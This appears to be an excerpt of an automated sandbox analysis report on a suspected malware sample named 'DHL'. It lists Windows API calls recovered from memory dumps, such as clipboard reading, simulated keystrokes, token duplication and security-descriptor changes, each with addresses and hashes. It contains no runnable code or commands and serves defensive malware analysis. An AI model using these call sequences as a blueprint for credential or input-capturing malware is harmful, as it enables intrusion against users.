                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 13277b419bef579934fd99ef75625dbd9b6c6b9c46a6529912f06145666f87d0
                                                        • Instruction ID: 4c1fad42060cae90e64c3d53c3b3425a7df81e9ffa8a0dff10b30d5e978b7597
                                                        • Opcode Fuzzy Hash: 13277b419bef579934fd99ef75625dbd9b6c6b9c46a6529912f06145666f87d0
                                                        • Instruction Fuzzy Hash: 3ED06C3204020DBBDF028F84DD06EDA3BAAFB48714F014100BE1866020C732E822AB90
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 009A1CBC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem
                                                        • String ID:
                                                        • API String ID: 3098949447-0
                                                        • Opcode ID: 2b72e56849b5a29aa318f7e66cfa572ef6375f2fde0132cd29b14e708fa159b2
                                                        • Instruction ID: 147b6c6890312247ac415dcdf29035a068e656ec72a74853099c2de092a8c5a6
                                                        • Opcode Fuzzy Hash: 2b72e56849b5a29aa318f7e66cfa572ef6375f2fde0132cd29b14e708fa159b2
                                                        • Instruction Fuzzy Hash: A2C092362C0304EFF214CBD4BC4EF1077A4A348B15F04C002F64DA95E3C3A228A2EB60
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 00E152B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1465502144.0000000000E13000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E13000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e13000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                        • Instruction ID: 21dc90d837fe8bfd440e535c5126dcb9a79fe7b6f02877de8f6960c67caa431c
                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                        • Instruction Fuzzy Hash: D0E0BF7594010DEFDB00DFA4D5496DD7BB4EF04301F1005A1FD05E7690DB709E54CA62
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 00E152B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1465502144.0000000000E13000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E13000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e13000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: ba9654a034d0b400f7326d4a73170458df8c08f9b5efa7641f800657e2ca8b44
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: B5E0E67594010DDFDB00DFB4D5496DD7BF4EF04301F100161FD01E2280D6709D50CA62
                                                        APIs
                                                          • Part of subcall function 009B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009B9BB2
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A3961A
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A3965B
                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A3969F
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A396C9
                                                        • SendMessageW.USER32 ref: 00A396F2
                                                        • GetKeyState.USER32(00000011), ref: 00A3978B
                                                        • GetKeyState.USER32(00000009), ref: 00A39798
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A397AE
                                                        • GetKeyState.USER32(00000010), ref: 00A397B8
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A397E9
                                                        • SendMessageW.USER32 ref: 00A39810
                                                        • SendMessageW.USER32(?,00001030,?,00A37E95), ref: 00A39918
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A3992E
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A39941
                                                        • SetCapture.USER32(?), ref: 00A3994A
                                                        • ClientToScreen.USER32(?,?), ref: 00A399AF
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A399BC
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A399D6
                                                        • ReleaseCapture.USER32 ref: 00A399E1
                                                        • GetCursorPos.USER32(?), ref: 00A39A19
                                                        • ScreenToClient.USER32(?,?), ref: 00A39A26
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A39A80
                                                        • SendMessageW.USER32 ref: 00A39AAE
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A39AEB
                                                        • SendMessageW.USER32 ref: 00A39B1A
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A39B3B
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A39B4A
                                                        • GetCursorPos.USER32(?), ref: 00A39B68
                                                        • ScreenToClient.USER32(?,?), ref: 00A39B75
                                                        • GetParent.USER32(?), ref: 00A39B93
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A39BFA
                                                        • SendMessageW.USER32 ref: 00A39C2B
                                                        • ClientToScreen.USER32(?,?), ref: 00A39C84
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A39CB4
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A39CDE
                                                        • SendMessageW.USER32 ref: 00A39D01
                                                        • ClientToScreen.USER32(?,?), ref: 00A39D4E
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A39D82
                                                          • Part of subcall function 009B9944: GetWindowLongW.USER32(?,000000EB), ref: 009B9952
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A39E05
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                        • String ID: @GUI_DRAGID$F
                                                        • API String ID: 3429851547-4164748364
                                                        • Opcode ID: d2d37ba9311a4fb093caceb6143ae33c5b7b25a85f489261b6f6e0f77cf56856
                                                        • Instruction ID: 6017aea652d371ffa779c876139ceabeecdbad322eb3509b7f202d356f0054a5
                                                        • Opcode Fuzzy Hash: d2d37ba9311a4fb093caceb6143ae33c5b7b25a85f489261b6f6e0f77cf56856
                                                        • Instruction Fuzzy Hash: 81428A35205201AFDB24CF68CC85FABBBE5FF89320F104619F699972A1D7B1E851CB51
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00A348F3
                                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00A34908
                                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00A34927
                                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00A3494B
                                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00A3495C
                                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00A3497B
                                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00A349AE
                                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00A349D4
                                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00A34A0F
                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A34A56
                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A34A7E
                                                        • IsMenu.USER32(?), ref: 00A34A97
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A34AF2
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A34B20
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A34B94
                                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00A34BE3
                                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00A34C82
                                                        • wsprintfW.USER32 ref: 00A34CAE
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A34CC9
                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00A34CF1
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A34D13
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A34D33
                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00A34D5A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                        • String ID: %d/%02d/%02d
                                                        • API String ID: 4054740463-328681919
                                                        • Opcode ID: 728307a82330893111cbeea64ee6d925cb4f356d253e37e0a2400b0f6edde39c
                                                        • Instruction ID: bc6f1900b8b135f50d72b34a93ebb80a9a38d8a9e52bf8e20ff0232aa7416bf7
                                                        • Opcode Fuzzy Hash: 728307a82330893111cbeea64ee6d925cb4f356d253e37e0a2400b0f6edde39c
                                                        • Instruction Fuzzy Hash: 5C120471600214ABEB258F68CC4AFBE7BF8EF89750F144129F515EB2E1DB78A941CB50
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 009BF998
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009FF474
                                                        • IsIconic.USER32(00000000), ref: 009FF47D
                                                        • ShowWindow.USER32(00000000,00000009), ref: 009FF48A
                                                        • SetForegroundWindow.USER32(00000000), ref: 009FF494
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009FF4AA
                                                        • GetCurrentThreadId.KERNEL32 ref: 009FF4B1
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009FF4BD
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 009FF4CE
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 009FF4D6
                                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 009FF4DE
                                                        • SetForegroundWindow.USER32(00000000), ref: 009FF4E1
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009FF4F6
                                                        • keybd_event.USER32(00000012,00000000), ref: 009FF501
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009FF50B
                                                        • keybd_event.USER32(00000012,00000000), ref: 009FF510
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009FF519
                                                        • keybd_event.USER32(00000012,00000000), ref: 009FF51E
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009FF528
                                                        • keybd_event.USER32(00000012,00000000), ref: 009FF52D
                                                        • SetForegroundWindow.USER32(00000000), ref: 009FF530
                                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 009FF557
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: 715f171c9f0e01bcd9159e0667e724a2b7bcd1bf5235a67e1ad92b85595f7a0f
                                                        • Instruction ID: 8e87c363ccbf2ff0b70af1e24e013bc8f2bfcc6bd38e6434733723fd5f883d8c
                                                        • Opcode Fuzzy Hash: 715f171c9f0e01bcd9159e0667e724a2b7bcd1bf5235a67e1ad92b85595f7a0f
                                                        • Instruction Fuzzy Hash: C6311071A8021CBAEB21ABF55C4AFBF7E6DEB44B60F100465FA01F61D1D6B19901AB60
                                                        APIs
                                                          • Part of subcall function 00A016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A0170D
                                                          • Part of subcall function 00A016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A0173A
                                                          • Part of subcall function 00A016C3: GetLastError.KERNEL32 ref: 00A0174A
                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00A01286
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00A012A8
                                                        • CloseHandle.KERNEL32(?), ref: 00A012B9
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A012D1
                                                        • GetProcessWindowStation.USER32 ref: 00A012EA
                                                        • SetProcessWindowStation.USER32(00000000), ref: 00A012F4
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A01310
                                                          • Part of subcall function 00A010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A011FC), ref: 00A010D4
                                                          • Part of subcall function 00A010BF: CloseHandle.KERNEL32(?,?,00A011FC), ref: 00A010E9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                        • String ID: $default$winsta0
                                                        • API String ID: 22674027-1027155976
                                                        • Opcode ID: 93774397ba5cef9b58ed7a09e4e1ac5efb0336de9059a3c52b6d55b27daba614
                                                        • Instruction ID: 980b807f6eb624c148088fdd27ab1c17f48ec8eeddbfe629c4a5df0dc7a4a4da
                                                        • Opcode Fuzzy Hash: 93774397ba5cef9b58ed7a09e4e1ac5efb0336de9059a3c52b6d55b27daba614
                                                        • Instruction Fuzzy Hash: 4A8199B1A0020DABDF21DFA4EC49FEE7BB9EF08714F144129F911B61A0C7328A55CB21
                                                        APIs
                                                          • Part of subcall function 00A010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A01114
                                                          • Part of subcall function 00A010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A00B9B,?,?,?), ref: 00A01120
                                                          • Part of subcall function 00A010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A00B9B,?,?,?), ref: 00A0112F
                                                          • Part of subcall function 00A010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A00B9B,?,?,?), ref: 00A01136
                                                          • Part of subcall function 00A010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A0114D
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A00BCC
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A00C00
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A00C17
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00A00C51
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A00C6D
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A00C84
                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A00C8C
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A00C93
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A00CB4
                                                        • CopySid.ADVAPI32(00000000), ref: 00A00CBB
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A00CEA
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A00D0C
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A00D1E
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A00D45
                                                        • HeapFree.KERNEL32(00000000), ref: 00A00D4C
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A00D55
                                                        • HeapFree.KERNEL32(00000000), ref: 00A00D5C
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A00D65
                                                        • HeapFree.KERNEL32(00000000), ref: 00A00D6C
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00A00D78
                                                        • HeapFree.KERNEL32(00000000), ref: 00A00D7F
                                                          • Part of subcall function 00A01193: GetProcessHeap.KERNEL32(00000008,00A00BB1,?,00000000,?,00A00BB1,?), ref: 00A011A1
                                                          • Part of subcall function 00A01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A00BB1,?), ref: 00A011A8
                                                          • Part of subcall function 00A01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A00BB1,?), ref: 00A011B7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                        • String ID:
                                                        • API String ID: 4175595110-0
                                                        • Opcode ID: 1d925093758b9ddb5f58626f7e6ef568ad0ef45f86e6874ee0f4c69bc2960716
                                                        • Instruction ID: 33f88b2516134c74d147323dc941d0106624dd021d36967c7c983dd63f882382
                                                        • Opcode Fuzzy Hash: 1d925093758b9ddb5f58626f7e6ef568ad0ef45f86e6874ee0f4c69bc2960716
                                                        • Instruction Fuzzy Hash: 9471587290021AABDF10DFE4EC44FAEBBB8BF05310F044615F915B6291D771AA06CBB0
                                                        APIs
                                                        • OpenClipboard.USER32(00A3CC08), ref: 00A1EB29
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A1EB37
                                                        • GetClipboardData.USER32(0000000D), ref: 00A1EB43
                                                        • CloseClipboard.USER32 ref: 00A1EB4F
                                                        • GlobalLock.KERNEL32(00000000), ref: 00A1EB87
                                                        • CloseClipboard.USER32 ref: 00A1EB91
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00A1EBBC
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00A1EBC9
                                                        • GetClipboardData.USER32(00000001), ref: 00A1EBD1
                                                        • GlobalLock.KERNEL32(00000000), ref: 00A1EBE2
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00A1EC22
                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 00A1EC38
                                                        • GetClipboardData.USER32(0000000F), ref: 00A1EC44
                                                        • GlobalLock.KERNEL32(00000000), ref: 00A1EC55
                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A1EC77
                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A1EC94
                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A1ECD2
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00A1ECF3
                                                        • CountClipboardFormats.USER32 ref: 00A1ED14
                                                        • CloseClipboard.USER32 ref: 00A1ED59
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                        • String ID:
                                                        • API String ID: 420908878-0
                                                        • Opcode ID: 530f67fe15ceeac999ddb0d672196be568944e08a2f0f36d2a2a739f0d03f5b2
                                                        • Instruction ID: 5f9a1f9971171e54323d2c4fb2aef9381ba82d39ff61bf8e958a143b94bc7e28
                                                        • Opcode Fuzzy Hash: 530f67fe15ceeac999ddb0d672196be568944e08a2f0f36d2a2a739f0d03f5b2
                                                        • Instruction Fuzzy Hash: B561C0352083019FD300EF64DC89FAAB7E8AF85754F18951DF856972A1CB31DD86CBA2
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A169BE
                                                        • FindClose.KERNEL32(00000000), ref: 00A16A12
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A16A4E
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A16A75
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A16AB2
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A16ADF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                        • API String ID: 3830820486-3289030164
                                                        • Opcode ID: d7ffba07d5afe1dc58a114558426b82282ae7f694bf23fc8c42743b4d011f660
                                                        • Instruction ID: dcc77289195037cc2046ce782ae1840d9c2ec6a6cd02ce8c60ac0ab602a38fa7
                                                        • Opcode Fuzzy Hash: d7ffba07d5afe1dc58a114558426b82282ae7f694bf23fc8c42743b4d011f660
                                                        • Instruction Fuzzy Hash: C4D13E72508310AEC710EBA4CD96EABB7FCBF89704F04491DF589D6191EB74DA44CBA2
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00A19663
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00A196A1
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00A196BB
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00A196D3
                                                        • FindClose.KERNEL32(00000000), ref: 00A196DE
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00A196FA
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A1974A
                                                        • SetCurrentDirectoryW.KERNEL32(00A66B7C), ref: 00A19768
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A19772
                                                        • FindClose.KERNEL32(00000000), ref: 00A1977F
                                                        • FindClose.KERNEL32(00000000), ref: 00A1978F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1409584000-438819550
                                                        • Opcode ID: 3c828353bb052e39b3620d0a40cacb75c166c3b869ad8b60833fe4c643c0c4aa
                                                        • Instruction ID: 6148ee9596e5b5f072045abd6d39df5d9415ca184d4b8c001185aa6a7abdf2fa
                                                        • Opcode Fuzzy Hash: 3c828353bb052e39b3620d0a40cacb75c166c3b869ad8b60833fe4c643c0c4aa
